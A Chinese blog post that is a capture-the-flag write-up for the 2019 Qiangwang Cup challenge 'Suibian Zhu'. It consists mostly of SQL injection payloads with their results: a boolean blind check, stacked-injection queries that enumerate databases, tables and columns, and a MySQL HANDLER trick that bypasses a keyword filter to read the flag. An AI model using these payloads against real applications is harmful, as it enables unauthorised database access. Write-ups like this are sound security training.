[强网杯 2019]随便注

发表于2023-06-30 | 更新于 2023-06-30 | sql注入

| 字数总计: 600 | 阅读时长: 1分钟 | 阅读量: 197

这篇文章距离最后更新已过448 天,如果文章内容或图片资源失效，请留言反馈，我会及时处理，谢谢！

1'#未报错，应该是''闭合的；
1' order by 3# 报错
1' union select 1,2# ==>return preg_match("/select|update|delete|drop|insert|where|./i",$inject);
0' or length(database())=9# ==> 正常回显
用布尔盲注确定database()=supersqli
堆叠注入 1';show databases;#
ctftraining,information_schema,mysql,performance_schema,supersqli,test
1';show tables;#
1919810931114514,words
1';show columns from words from supersqli;#
id,data
1';show columns from 1919810931114514 from supersqli;#
flag
1';Handler 1919810931114514 OPEN;Handler 1919810931114514 read first;Handler FlagHere close;#
得到flag

作者: CHHHCHHOH

文章链接: http://chhhchhoh.cn/archives/142/

堆叠注入

评论